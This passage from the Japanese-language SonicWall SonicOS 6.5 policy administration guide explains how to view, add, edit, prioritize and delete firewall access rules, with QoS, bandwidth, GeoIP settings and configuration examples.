• 「送信元 IP」 のみを変更でき、 「すべて」 ほどアグレッシブでない送信元に設定するこ

とができます。

「TCP 経由の DNS プロキシ」 が有効になっていると、 別の許可ルールが自動的に追加されます。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定11

アクセス ルールの表示 アクセス ルールの表示はい く つかの方法でカスタマイズできます。 それらの方法は単独で、 または

組み合わせて使用することができます。

ト ピック :

• IP バージ ョ ンによるルールの表示 (12 ページ)

• カスタム ルール タイプまたは既定のルール タイプの表示 (12 ページ)

• ページの更新 (12 ページ)

• 表示列のカスタマイズ (13 ページ)

• 無効または未使用のルールの表示 (13 ページ)

• アクセス ルール統計を消去 (13 ページ)

• ルール テーブルを既定の表示に戻す (13 ページ)

• ゾーン別にルールを表示し、 マ ト リ ッ クス ビューを使用する (14 ページ)

• ゾーン間アクセス ルールの 大数の指定 (14 ページ)

IP バージ ョ ンによるルールの表示

選択した IP プロト コルのルールのみを表示するには、 ページ上部の 「Show」 オプションを使用します。

• IPv4

• IPv6

• IPv4 および IPv6 (既定)

カスタム ルール タイプまたは既定のルール タイプの表示

ページの上部にある 「表示」 オプシ ョ ンを使用して、 システムのデフォルト ルールとカスタム定義

ルールの表示を制御します。

• 「すべてのタイプ」 (既定)

• 既定

• ユーザ定義

表の 「クラス」 列には、 各ルールの 「ユーザ定義」 または 「 既定」 が表示されます。

ページの更新

「再表示」 アイコン を選択して、 他の表示オプシ ョ ンを変更した後でページを更新します。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定12

表示列のカスタマイズ

既定では、 すべての列が表示されています。 「表示オプシ ョ ン」 アイコン を選択して、 ページに

表示されている列の一部を無効にします。

列の表示を無効にするには、 該当するチェ ックボックスをオフにします。

無効または未使用のルールの表示

「表示オプション」 アイコン を選択し、 次のいずれかのオプションを選択して、 無効または未使用

のルールの表示を切り替えます。 現在表示されている場合、 オプションを選択するとそれらのルールは非表示になります。 現在非表示の場合、 オプションを選択するとそれらのルールが表示されます。

• 無効なルールの表示切り替え

• 未使用ルールの表示切り替え

アクセス ルール統計を消去

「クリア」 アイコン を選択して、 ページ上のすべてのアクセス ルールの統計情報を消去します。

「設定」 列見出しの下にある各行のグラフ アイコンにマウスを移動することで、 アクセス ルールの

統計情報を表示できます。

ルール テーブルを既定の表示に戻す

「復旧」 アイコン を選択して、 ルール テーブルの表示を既定の設定に戻します。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定13

ゾーン別にルールを表示し、 マト リ ックス ビューを使用する

既定では、 適用されるゾーンに関係な く、 すべてのルールが表示されます。 特定のソース ゾーンと

宛先ゾーンをカバーするアクセス ルールのみに表示を制限するには、 ページ上部の次のオプシ ョ ン

のいずれかを使用します。

• 「検索」 - 値を入力して、 特定のゾーン種別、 優先順位、 送信元/送信先、 その他の条件に一致す

るすべてのゾーンを表示します。 例えば、 「DMZ」 と入力すると、 すべての DMZ に関するゾー

ンが表示され、 「フ ァイアウォール」 と入力すると、 種別を問わずファイアウォールを送信元または送信先とするすべてのゾーンが表示されます。

• 「送信元/送信先」 - 「すべて」 またはドロップダウン メニューを使って、 目的のゾーンを選択し

ます。

• 「マ ト リ ックス ビュー」 アイコン - ソースと目的地の組み合わせごとに別々のテーブルと

してルールを表示するには、 アイコンを選択します。

これらのオプシ ョ ンは、 ルールと優先度タイプのサブセッ ト を表示する方法を提供します。 例えば、次のルール サブセッ ト - VPN から WAN ページなどです。

ルール サブセッ ト - VPN から WAN

ゾーン間アクセス ルールの 大数の指定

すべてのゾーン間ペアの 「アクセス ルール」 テーブルのサイズは設定可能ですが、 フ ァイアウォー

ル プラ ッ ト フォームごとに上限が定められています。 ゾーン間のアクセス ルールの 大数を参照し

て ください。

重要 : この機能を正し く動作させるためには、 ファイアウォールを再起動する必要があります。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定14

大サイズを変更するには:

1 ゾーン間ペアを選択します。 表の上にある淡い 「 大ルール数」 アイコンが使用可能になり、

マウスの上にオレンジ色の アイコンが表示されます。

2 「 大ルール数」 アイコンを選択します。 「 大ルール数の変更」 ダイアログが表示されます。

3 「 大ルール数」 フ ィールドに 大数を入力します。

4 「OK」 を選択します。

表の一番上にある 「 大ルール数」 は、 新しいカウン ト を表示します。

5 「更新」 で、 「再起動」 を選択します。

ルールの優先順位の変更任意のビューで、 アクセス ルールは、 も限定的なものがテーブルの一番上に、 も限定的でない

ものが一番下になるように並べ替えられます。 テーブルの一番下には 「すべて」 ルールが表示されます。 ルールが多数ある場合は、 特定の送信元および送信先ゾーンのルールのみを表示すると便利です。 特定のゾーンのアクセス ルールを表示するには、 「マ ト リ ッ クス」 または 「送信先」 / 「送信

元」 ドロップダウン メニューからゾーンを選択します。

ゾーン間のアクセス ルールの 大数

プラッ ト フォーム ルールの 大数

SM 9200/9400/9600 5000

NSA 2600/2650/3600/4600/5600/6600 2500

TZ300/TZ400/TZ500/TZ600TZ300W/TZ400W/TZ500W

1250

SOHO Wireless 250

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定15

アクセス ルールの優先順位を変更するには:

1 「送信元」 および 「送信先」 ドロップダウン メニューから特定の送信元および送信先ゾーンを

選択して指定します。 「優先度」 列には、 「優先度」 の数字とアイコンが含まれています。

2 アクセス ルールの 「優先順位」 列にある優先順位アイコンを選択します。 「優先順位の変更」

ダイアログが表示されます。

3 「優先順位」 フ ィールドに新しい優先順位の数値 (1~10) を入力します。

4 「OK」 を選択します。

アクセス ルールの追加

ヒン ト : 削除アイコンや編集アイコンが淡色表示されている (使用できない) 場合は、 アクセス

ルールを変更したり、 リス トから削除したりすることはできません。

ヒン ト : 着信 IP ト ラフ ィ ッ クを許可する個別アクセス ルールは作成可能ですが、 SonicWall セキュリテ ィ装置は、 SYN フラ ッ ドや Ping of Death 攻撃などの DoS 攻撃に対する保護を無効にして

いません。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定16

アクセスルールを追加するには:

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 に移動します。

2 「アクセス ルール」 テーブルの 「追加」 ボタンを選択します。 「ルールの追加」 ダイアログが

表示されます。

3 次の説明どおり、 「アクセス ルール」 ダイアログの各画面で設定を行います。

• 一般設定の構成 (18 ページ)

• 詳細設定の構成 (20 ページ)

• QoS 設定値の構成 (21 ページ)

• 詳細帯域幅管理での帯域幅管理の設定 (22 ページ)

• グローバル帯域幅管理での帯域幅管理の設定 (24 ページ)

• GeoIP 設定値の構成 (24 ページ)

• ルールの追加 (25 ページ)

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定17

一般設定の構成1 「一般」 画面の 「設定」 の下で、 指定した IP ト ラフ ィ ックをルールによってどのように処理 (許

可または遮断) するかの 「動作」 を選択します。

• 許可 (既定)

• 禁止

• 破棄

2 「送信元」 および 「送信先」 ドロップダウン メニューから送信元ゾーンと送信先ゾーンをそれ

ぞれ選択します。

3 「送信元ポート」 ドロップダウン メニューから、 選択されたサービス オブジェク ト /グループで

定義されている送信元ポー ト を選択します。 選択されたサービス オブジェ ク ト /グループに

は、 「サービス」 ドロップダウン メニューで選択されているものと同じプロ ト コル種別が設定

されている必要があります。 既定は 「すべて」 です。

サービスがリス トに表示されていない場合は、 次のいずれかを選択して 「サービスの追加」 ダイアログでサービスを定義する必要があります。

• サービスの作成 ( 「サービスの追加」 ダイアログを表示する場合)。

• グループの作成 ( 「サービス グループの追加 」 ダイアログを表示する場合)。

4 「サービス」 ドロップダウン メニューから、 アクセス ルールの影響を受けるサービスまたはサー

ビスのグループを選択します。 「すべて」 のサービスにはすべての IP サービスを含みます。

サービスがリス トに表示されていない場合は、 次のいずれかを選択して 「サービスの追加」 ダイアログでサービスを定義する必要があります。

• サービスの作成 ( 「サービスの追加」 ダイアログを表示する場合)。

• グループの作成 ( 「サービス グループの追加 」 ダイアログを表示する場合)。

5 「送信元」 ドロップダウン メニューから、 アクセス ルールの影響を受ける ト ラフ ィ ックの送信

元を選択します。

「ネッ トワークの作成」 を選択すると、 「アドレス オブジェク トの追加」 ダイアログが表示さ

れます。

a オブジェク トの 「名前」 を指定し、 「ゾーン割り当て」 のゾーンを選択します。

b オブジェク トの 「種別」 を選択します。 残りのフ ィールドは、 選択したオブジェ ク トの種別によって異なります。 各フ ィールドに入力した後、 「OK」 を選択します。

例えば、 特定のユーザによるインターネッ ト アクセスを制限するなどのアクセス ルー

ルの影響を受ける送信元 IP アドレスを定義する場合は、 次の操作を行います。

1) 「種別」 ドロップダウン メニューから 「範囲」 を選択します。

2) 「アドレス範囲の開始」 フ ィールドにアドレス範囲の開始 IP アドレスを、 「アド

レス範囲の終了」 フ ィールドにアドレス範囲の終了 IP アドレスを、 それぞれ入力

します。

3) 「OK」 を選択します。

6 「送信先」 ドロップダウン メニューから、 アクセス ルールに影響される ト ラフ ィ ックの送信先

を選択します。

ヒン ト : すべての IP アドレスを含めるには、 アスタ リスク (*) を 「アドレス範囲の

開始」 フ ィールドに入力します。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定18

「ネッ トワークの作成」 を選択すると、 「アドレス オブジェク トの追加」 ダイアログが表示さ

れます。

7 「包含ユーザ」 ドロップダウン メニューから、 アクセス ルールで許可されるユーザまたはユー

ザ グループを選択します。

8 「除外ユーザ」 ドロップダウン メニューから、 アクセス ルールで拒否されるユーザまたはユー

ザ グループを選択します。

9 「スケジュール」 ドロップダウン メニューからスケジュールを選択します。 既定のスケジュー

ルは 「常に有効」 です。

10 「コ メン ト」 フ ィールドに、 アクセス ルールの識別に有効な任意のコ メン ト を入力します。

11 サービスの動作ログを有効にするには、 「ログを有効にする」 チェ ッ クボックスをオンにします。 このオプシ ョ ンは、 既定では選択されています。

12 「断片化パケッ ト を許可する」 チェ ッ クボックスは既定で選択されています。

13 このアクセス ルールに一致するフローが 「AppFlow 監視」 ページと 「AppFlow 報告」 ページに

表示されるようにするには、 「フロー報告を有効にする」 チェ ッ クボッ クスをオンにします。このオプシ ョ ンは、 既定では選択されていません。

14 このアクセス ルールに一致するフローが 「パケッ ト監視」 ページに表示されるようにするには、

「パケッ ト監視を有効にする」 チェ ッ クボッ クスをオンにします。 このオプシ ョ ンは、 既定では選択されていません。

15 管理ト ラ フ ィ ッ ク と非管理 ト ラ フ ィ ッ クの両方を有効にするには、 「管理を有効にする」チェ ッ クボックスをオンにします。 このオプシ ョ ンは、 既定では選択されていません。

16 ボッ トネッ ト フ ィルタを使用する場合は、 「ボッ トネッ ト フ ィルタを有効にする」 チェ ックボッ

クスをオンにします。 ボッ ト ネッ ト フ ィルタの詳細については、 『SonicOS セキュ リテ ィ構

成』 ドキュ メ ン トの 「セキュ リテ ィ サービス > ボッ ト ネッ ト フ ィルタ」 を参照して く ださ

い。 このオプシ ョ ンは、 既定では選択されていません。

17 このアクセス ルールに一致するト ラフ ィ ックで SIP 変換を有効にするには、 「SIP 変換を有効に

する」 チェ ックボックスをオンにします。 このオプションは、 既定では選択されていません。

既定では、 SIP クライアン トは自身のプライベート IP アドレスを、 SIP プロキシ宛てに送信される

SIP (セッシ ョ ン開始プロ ト コル) セッシ ョ ン定義プロ ト コル (SDP) メ ッセージに使用します。 SIPプロキシがフ ァ イアウォールのパブリ ッ ク (WAN) 側に配置されていて、 SIP クライアン トが

フ ァイアウォールのプライベート (LAN) 側に配置されている場合、 SDP メ ッセージは変換され

ないため、 SIP プロキシは SIP クライアン トに到達できません。 SIP 変換を有効にすると、 プラ

イベー ト IP ア ド レスと割り当てられたポー ト を変更するこ とによって、 SonicOS が SIP メ ッ

セージを LAN から WAN に変換するようにすることで、 この問題を解決します。

SIP 変換の詳細については、 『SonicOS システム セッ トアップ』 マニュアルの 「VOIP | SIP 設定」

セクシ ョ ンを参照して ください。

18 このアクセス ルールに一致する ト ラフ ィ ッ クで H.323 変換を有効にするには、 「H.323 変換を

有効にする」 チェ ッ クボッ クスをオンにします。 このオプシ ョ ンは、 既定では選択されていません。

19 詳細設定の構成 (20 ページ) に進んで ください。

メモ : 大きな IP パケッ トは、 しばしば断片化されてからインターネッ ト上でルーテ ィ ン

グされ、 送信先ホス ト で再編成されます。 この設定を無効にする 1 つの理由と して、

サービス拒否 (DoS) 攻撃で IP 断片化を悪用される可能性があるからです。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定19

詳細設定の構成1 「詳細設定」 を選択します。

2 アクセス ルールで TCP 無動作期間経過後のタイムアウト を設定するには、 「TCP 接続無動作時

タイムアウト (分)」 フ ィールドに時間を分単位で設定します。 既定値は 15 分です。

3 アクセス ルールで UDP 無動作期間経過後のタイムアウトを設定するには、 「UDP 接続無動作時

タイムアウト (分)」 フ ィールドに時間を分単位で設定します。 既定値は 30 分です。

4 「許可された接続数 ( 大接続数に対する%)」 フ ィールドで、 許可される接続数を SonicWall セキュリテ ィ装置で許可される 大接続数に対するパーセン トで指定します。 接続の制限の詳細については、 接続の制限について (8 ページ) を参照して ください。

5 「各送信元 IP アドレスに対する接続制限を有効にする」 チェ ックボックスをオンにして、 パケッ

ト破棄のしきい値を定義します。 このしきい値を超えると、 対応する送信元 IP からの接続とパ

ケッ トが破棄されます。 小値は 0、 大値は 65535、 既定値は 128 です。 このオプシ ョ ン

は、 既定では選択されていません。

6 「各送信先 IP アドレスに対する接続制限を有効にする」 チェ ックボックスをオンにして、 パケッ

ト破棄のしきい値を定義します。 このしきい値を超えると、 対応する送信先 IP からの接続とパ

ケッ トが破棄されます。 小値は 0、 大値は 65535、 既定値は 128 です。 このオプシ ョ ン

は、 既定では選択されていません。

7 このアクセス ルールに対応する逆方向の (送信先ゾーンまたはアドレス オブジェク トから送信

元ゾーンまたはアドレス オブジェク トへの) アクセス ルールを作成する場合は、 「再帰ルール

を作成する」 を選択します。 このオプシ ョ ンは、 既定では選択されていません。

8 「精密パケッ ト検査 (DPI) スキャンをルール単位で無効にするには、 「DPI を無効にする」 チェ ッ

クボックスをオンにします。 このオプシ ョ ンは、 既定では選択されていません。

9 「認証されていないユーザからのト ラフ ィ ックに対する動作」 の下で :

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定20

• ルールに一致するト ラフ ィ ックに SSO を使用しない場合は、 「ユーザを認証するためにシ

ングル サインオンを起動しない」 チェ ッ クボックスをオンにします。 認証されていない

HTTP 接続は、 ログイン ページに直接送信されます。

• SSO がルールと一致する ト ラフ ィ ックを持つユーザを識別しよう としている間に、 ブラウ

ジングの遅延を避けるために、 「ユーザを認証するためにシングルサインオンを待っている間はト ラフ ィ ッ クを遮断しない」 チェ ッ クボッ クスを選択します。 この設定を有効にできるのは、 「SSO を待つ間にト ラフ ィ ッ クをブロッ クしない」 場合と、 「 含まれる

対象:」 のみです 「選択したアクセス ルール」 は、 SSO エージェン トの一般設定で設定し

ます。

• 「認証されていないユーザをログインにリダイレク ト しない」 チェ ックボックスをオンにすると、 SSO 経由でユーザを識別したり、 ログイン ページにリダイレク ト したりするので

はな く、 認証されていないユーザからの HTTP/HTTPS ト ラフ ィ ックがブロックされます。

10 QoS 設定値の構成 (21 ページ) に進んで ください。

QoS 設定値の構成

1 このルールの対象となる ト ラフ ィ ッ クに DSCP または 802.1p サービス品質管理を適用する場合

は、 「QoS」 を選択します。

2 「DSCP 級割設定」 で、 「DSCP 級割の方針」 をドロップダウン メニューから選択します。

• なし : パケッ トの DSCP 値は 0 にリセッ ト されます。

• 維持 (既定) パケッ トの DSCP 値は変更されません。

• 指定: 「DSCP 値の指定」 ドロップダウン メニューが表示されます。 0 ~ 63 の範囲の数値

を選択します。 一般的な値には次のようなものがあります。

0 - 大努力型/既定 (既定値) 20 - 等級 2、 銀 (AF22) 34 - 等級 4、 金 (AF41)

8 - 等級 1 22 - 等級 2、 銅 (AF23) 36 - 等級 4、 銀 (AF42)

10 - 等級 1、 金 (AF11) 24 - 等級 3 38 - 等級 4、 銅 (AF43)

12 - 等級 1、 銀 (AF12) 26 - 等級 3、 金 (AF31) 40 - エキスプレス転送

14 - 等級 1、 銅 (AF13) 27 - 等級 3、 銀 (AF32) 46 - 緊急転送 (EF)

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定21

• 参照: ページには、 「注 : 」 が表示されます 「ファイアウォール設定」 > 「QoS 割付」 ペー

ジの QoS 割付設定が使用されます。

• 「802.1p 級割を DSCP 値に優先する」 チェ ックボックスが表示されます。 DSCP 値が

802.1p 級割によってオーバーライ ド されるようにします。 このオプシ ョ ンは、 既

定では無効になっています。

3 「802.1p 級割の設定」 で、 「802.1p 級割の方針」 をドロップダウン メニューから選択します。

• なし (既定) 802.1p タグ付けをパケッ トに追加しません。

• 維持: パケッ トの 802.1p 値は変更されません。

• 指定: 「802.1p 値の指定」 ドロップダウン メニューが表示されます。 次の 0 ~ 7 の範囲の

数値を選択します。

• 参照: ページには、 「注 : 」 が表示されます 「ファイアウォール設定」 > 「QoS 割付」 ペー

ジの QoS 割付設定が使用されます。

4 詳細帯域幅管理での帯域幅管理の設定 (22 ページ) またはグローバル帯域幅管理での帯域幅管理

の設定 (24 ページ) に進んで ください。

詳細帯域幅管理での帯域幅管理の設定

1 「帯域幅管理」 を選択します。

16 - 等級 2 30 - 等級 3、 銅 (AF33) 48 - 制御用

18 - 等級 2、 金 (AF21) 32 - 等級 4 56 - 制御用

0 - 大努力型 (既定値) 4 - 負荷制御型

1 - バックグラウンド型 5 - 映像型 (< 待ち時間 100ms)

2 - 倹約型 6 - 音声型 (< 待ち時間 10ms)

3 - 高努力型 7 - ネッ トワーク制御型

メモ :帯域幅管理種別と して 「グローバル」 を指定している場合は、 グローバル帯域幅管理での帯域幅管理の設定 (24 ページ) を参照して ください。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定22

2 送信ト ラフ ィ ッ クで帯域幅管理を有効にするには、 「送信帯域幅管理を有効にする ( 「許可」

ルールのみ)」 チェ ッ クボッ クスをオンにします。 このオプシ ョ ンは、 既定では無効になって

います。

a 「帯域幅オブジェク ト」 ドロップダウン メニューから帯域幅オブジェク トを選択します。

新しい帯域幅オブジェ ク ト を作成するには、 「帯域幅オブジェ ク トの作成」 を選択します。 帯域幅オブジェク トの作成の詳細については、 帯域幅オブジェク トの設定 (220 ペー

ジ) を参照して ください。

3 受信ト ラフ ィ ッ クで帯域幅管理を有効にするには、 「受信帯域幅管理を有効にする ( 「許可」

ルールのみ)」 チェ ッ クボッ クスをオンにします。 このオプシ ョ ンは、 既定では無効になって

います。

a 「帯域幅オブジェク ト」 ドロップダウン メニューから帯域幅オブジェク トを選択します。

新しい帯域幅オブジェ ク ト を作成するには、 「帯域幅オブジェ ク トの作成」 を選択します。

4 帯域幅使用状況を追跡にするには、 「帯域幅使用状況の追跡を有効にする」 チェ ッ クボックスをオンにします。 このオプシ ョ ンは、 既定では無効になっています。 このオプシ ョ ンを選択する場合は、 「帯域幅管理を有効にする」 オプシ ョ ンのどちらかまたは両方を選択する必要があります。

5 GeoIP 設定値の構成 (24 ページ) に進んで ください。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定23

グローバル帯域幅管理での帯域幅管理の設定

1 「帯域幅管理」 を選択します。

2 送信ト ラフ ィ ッ クで帯域幅管理を有効にするには、 「送信帯域幅管理を有効にする ( 「許可」

ルールのみ)」 チェ ッ クボッ クスをオンにします。 このオプシ ョ ンは、 既定では無効になって

います。

a 「帯域幅優先順位」 ドロップダウン メニューで、 帯域幅優先順位を選択します。 高の優

先順位は 「0 リアルタイム」 で、 これが既定値です。 低の優先順位は 「7 低」 です。

3 受信ト ラフ ィ ッ クで帯域幅管理を有効にするには、 「受信帯域幅管理を有効にする ( 「許可」

ルールのみ)」 チェ ッ クボッ クスをオンにします。 このオプシ ョ ンは、 既定では無効になって

います。

a 「帯域幅優先順位」 ドロップダウン メニューで、 帯域幅優先順位を選択します。 高の優

先順位は 「0 リアルタイム」 で、 これが既定値です。 低の優先順位は 「7 低」 です。

4 GeoIP 設定値の構成 (24 ページ) に進んで ください。

GeoIP 設定値の構成

1 「地域 IP」 を選択します。

2 このルールに一致する ト ラフ ィ ッ クにフ ィルタを適用するには、 「地域 IP フ ィルタ」 を有効に

します。

3 このルールでグローバル地域 IP 国リスト を適用するには、 「グローバル」 を選択します。

メモ :帯域幅管理種別と して 「詳細」 を指定している場合は、 詳細帯域幅管理での帯域幅管理の設定 (22 ページ) を参照して ください。

メモ : 地域 IP フ ィルタをセキュリテ ィ サービスで指定して、 すべてのト ラフ ィ ッ クまたはポリ

シーごとに適用することができます。 詳細については、 『SonicOS セキュリテ ィ構成』 のドキュ

メン トの 「地域 IP フ ィルタの設定」 を参照して ください。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定24

4 このポリシーでユーザ定義地域 IP 国リス ト を指定するには、 「ユーザ定義」 を選択します。

「地域 IP フ ィルタを有効にする」 および 「ユーザ定義」 を選択すると、 「利用可能な国」 と

「選択した国」 フ ィールドが有効になります。

a 国を選択するには、 「利用可能な国」 リス トで国を選択し、 「選択した国」 フ ィールドにド ラ ッグします。

b 「選択した国」 リス トから国を削除するには、 国を選択し 「利用可能な国」 へド ラ ッグします。

5 どの既知の国にも一致しないト ラフ ィ ッ クを遮断するには、 「未定義国を遮断する」 を選択します。

6 ルールの追加 (25 ページ) に進んで ください。

ルールの追加1 「ルールの追加」 ダイアログの下部で、 「追加」 を選択してルールを追加します。 ルールが追

加されると、 ダイアログボックスに 「ルール動作が完了しました。 ルールテーブルを確認してください。 」 という メ ッセージが表示されます。

2 「閉じる」 を選択してダイアログを閉じます。

3 テーブルに目的のルールが追加されていることを確認します。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定25

アクセス ルールの編集

アクセス ルールを編集するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 に移動します。

2 アクセス ルールの 「設定」 列で 「編集」 アイコンを選択します。 「ルールの追加」 ダイアログ

と同じ設定の 「ルールの編集」 ダイアログが表示されます。

3 変更を加えます。

4 「OK」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定26

個別アクセス ルールの削除

1 つまたは複数のユーザ定義アクセス ルールを削除するには :

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 に移動します。

2 単独の個別アクセス ルールを削除するには、 設定列の 「削除」 アイコンを選択します。

3 選択したユーザ定義のアクセス ルールを削除するには、 削除するルールのチェ ックボックスを

オンにし、 「削除」 ドロップダウン リス トから 「選択した項目の削除」 を選択します。 この選

択は、 いずれかの個別アクセス ルールのチェ ックボックスをオンにするまでは淡色表示になっ

ています。

4 すべてのユーザ定義のアクセス ルールを削除するには、 「削除」 ドロップダウン リス トから

「すべて削除」 を選択します。

個別アクセス ルールの有効化と無効化アクセスルールは、 管理ビューの 「ポリシー | ルール > アクセスルール」 ページで有効または無効に

できます。

• ユーザ定義アクセス ルールを有効にするには、 その行の 「有効」 列のチェ ックボックスをオン

にします。

• ユーザ定義アクセス ルールを無効にするには、 その行の 「無効」 列のチェ ックボックスをオン

にします。

アクセス ルールの既定の設定の復元

エンド ユーザがゾーンについて設定したアクセス ルールをすべて削除するには :

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 に移動します。

2 「マ ト リ ックス」 アイコンを選択するか、 「送信元/送信先」 オプシ ョ ンを使用して、 すべての

ゾーンまたは特定のゾーンの組み合わせを選択します。

3 ページの上部にある 「復旧」 アイコン を選択します。 これにより、 選択したゾーンの組み

合わせのアクセス ルールが、 フ ァイアウォールで 初に設定された既定のアクセス ルールに

復元され、 SonicOS によって追加されます。 確認メ ッセージが表示されます。

4 「OK」 を選択します。

メモ :既定のアクセス ルールは削除できません。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定27

アクセス ルールのト ラフ ィ ッ ク統計の表示管理ビューの 「ポリシー | ルール > アクセス ルール」 ページで、 マウス ポインタ を 「設定」 列で

「統計」 アイコンに 移動し、 アクセスルールの受信 (Rx) ト ラフ ィ ッ ク と送信 (Tx) ト ラフ ィ ッ クの

統計情報を表示します。

• 受信バイ ト

• 受信パケッ ト

• 送信バイ ト

• 送信パケッ ト

統計情報のカウン タ をク リアしてカウン ト を再開するには、 表の上部にある 「ク リア」 アイ コン

を選択します。

アクセス ルールの設定例このセクシ ョ ンでは、 次のようなネッ トワーク アクセス ルールを追加する設定例を示します。

• Ping の有効化 (28 ページ)

• 特定のサービスへの LAN アクセスの遮断 (28 ページ)

• LAN ゾーンからの WAN プライマリ IP アクセスの許可 (29 ページ)

Ping の有効化

このセクシ ョ ンでは、 DMZ 上の機器が Ping 要求を送信して LAN 上の機器から Ping 応答を受信するこ

とを許可するアクセス ルールの設定例を示します。 既定では、 SonicWall ネッ トワーク セキュリテ ィ

装置は、 DMZ から開始され LAN に到達する ト ラフ ィ ックを許可しません。

DMZ と LAN の間の ping を許可するアクセスルールを設定するには、 次の手順を実行します。

1 インターフェースのいずれかを DMZ ゾーン内に配置します。

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 に移動します。

2 「追加」 を選択して 「ルールの追加」 ダイアログを表示します。

3 「許可」 ラジオ ボタンを選択します。

4 「サービス」 ドロップダウン メニューから、 「Ping」 を選択します。

5 「送信元」 ドロップダウン メニューから、 「DMZ サブネッ ト」 を選択します。

6 「送信先」 ドロップダウン メニューから、 「LAN サブネッ ト」 を選択します。

7 「追加」 を選択します。

特定のサービスへの LAN アクセスの遮断 このセクシ ョ ンでは、 業務時間中に LAN からインターネッ ト上の NNTP サーバへのアクセスを遮断す

るアクセス ルールの設定例を示します。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定28

スケジュールに基づいて LAN から NNTP サーバへのアクセスを遮断するアクセス ルールを

設定するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 に移動します。

2 「追加」 を選択して 「ルールの追加」 ダイアログを表示します。

3 「動作」 の設定から 「拒否」 を選択します。

4 「サービス」 ドロップダウン メニューから 「NNTP (ニュース)」 を選択します。 サービスがリス

トに表示されていない場合は、 「サービスの追加」 ダイアログでサービスを追加する必要があります。

5 「送信元」 ドロップダウン メニューから 「すべて」 を選択します。

6 「送信先」 ドロップダウン メニューから 「WAN」 を選択します。

7 「スケジュール」 ドロップダウン メニューからスケジュールを選択します。

8 「コ メン ト」 フ ィールドに任意のコ メン ト を入力します。

9 「追加」 を選択します。

LAN ゾーンからの WAN プライマリ IP アクセスの許可

アクセス ルールを作成すると、 同じフ ァイアウォールに関して、 あるゾーンの管理 IP アドレスに対

する別のゾーンからのアクセスを許可することができます。 例えば、 LAN 側からの WAN IP アドレス

への Ping や HTTP/HTTPS 管理を許可するこ とができます。 そのためには、 アクセス ルールを作成し

て、 ゾーン間でそのサービスを許可し、 送信先として 1 つまたは複数の明示的な管理 IP アドレスを指

定する必要があります。 あるいは、 送信先と して 1 つまたは複数の管理アド レス (WAN プライマリ

IP、 すべての WAN IP、 すべての X1 管理 IP など) が含まれるアドレス グループを指定することもでき

ます。 このタイプのルールは、 ゾーン間での HTTP 管理、 HTTPS 管理、 SSH 管理、 Ping、 および SNMPのサービスを可能にするものです。

LAN ゾーンからの WAN プライマリ IP へのアクセスを許可するルールを作成するには、 以下

の手順に従います。

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 に移動します。

2 「マ ト リ ッ クス」 アイコンを選択するか、 「送信元/送信先」 オプシ ョ ンを使用して、 「LAN >WAN」 アクセス ルールを選択します。

3 「追加」 を選択して 「ルールの追加」 ダイアログを表示します。

4 「動作」 の設定から 「許可」 を選択します。

5 「サービス」 メニューから次のサービスのいずれかを選択します。

• HTTP

• HTTPS

• SSH 管理

• Ping

• SNMP

6 「送信元」 メニューから 「すべて」 を選択します。

メモ : アクセス ルールはゾーン間管理についてのみ設定できます。 ゾーン内管理はインター

フェース設定によりインターフェース単位で制御されます。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定29

7 「送信先」 メニューから 1 つまたは複数の明示的な WAN IP アドレスが含まれるアドレス グルー

プまたはアドレス オブジェク ト を選択します。

8 「包含ユーザ」 メニューからアクセスを許可するユーザまたはグループを選択します。

9 「スケジュール」 メニューからスケジュール時刻を選択します。

10 「コ メン ト」 フ ィールドに任意のコ メン ト を入力します。

11 「追加」 を選択します。

アクセス ルールでの帯域幅管理の有効化

帯域幅管理は、 アクセス ルールを使用して受信ト ラフ ィ ッ クと送信ト ラフ ィ ッ クの両方に適用できま

す。 じ ょ うごアイコンが表示されているアクセス ルールは、 帯域幅管理用に設定されたものです。

帯域幅管理の設定については、 『SonicOS セキュ リテ ィ設定』 ドキュ メン トの 「フ ァイアウォール設

定 > 帯域幅管理」 セクシ ョ ンを参照して ください。

メモ : WAN プライマリ サブネッ トなどのサブネッ ト を表すアドレス グループやア

ドレス オブジェク トは選択しないで く ださい。 それでは、 WAN 管理 IP アドレスへ

のアクセスではな く、 既定で許可されている WAN サブネッ トの機器へのアクセス

を許可することになります。

ヒン ト : あるゾーンの複数のインターフ ェースに帯域幅管理を設定する場合、 設定したゾーンの保証帯域幅が、 そのゾーンにバインド されているインターフ ェースで利用可能な帯域幅を超えるような設定は行わないで ください。

SonicWall SonicOS 6.5 ポリシー管理

アクセス ルールの設定30

2

アプリケーシ ョ ン ルール ポリシーの

設定

• アプリケーシ ョ ン ルールについて (32 ページ)

• アプリケーシ ョ ン ルールとは? (32 ページ)

• アプリケーシ ョ ン ルールのメ リ ッ ト (34 ページ)

• アプリケーシ ョ ン制御の仕組み (35 ページ)

• アプリケーシ ョ ン ルールとアプリケーシ ョ ン制御 のライセンス (39 ページ)

• 用語 (41 ページ)

• ルール > アプリケーシ ョ ン ルール (42 ページ)

• アプリケーシ ョ ンルールポリシーの設定 (42 ページ)

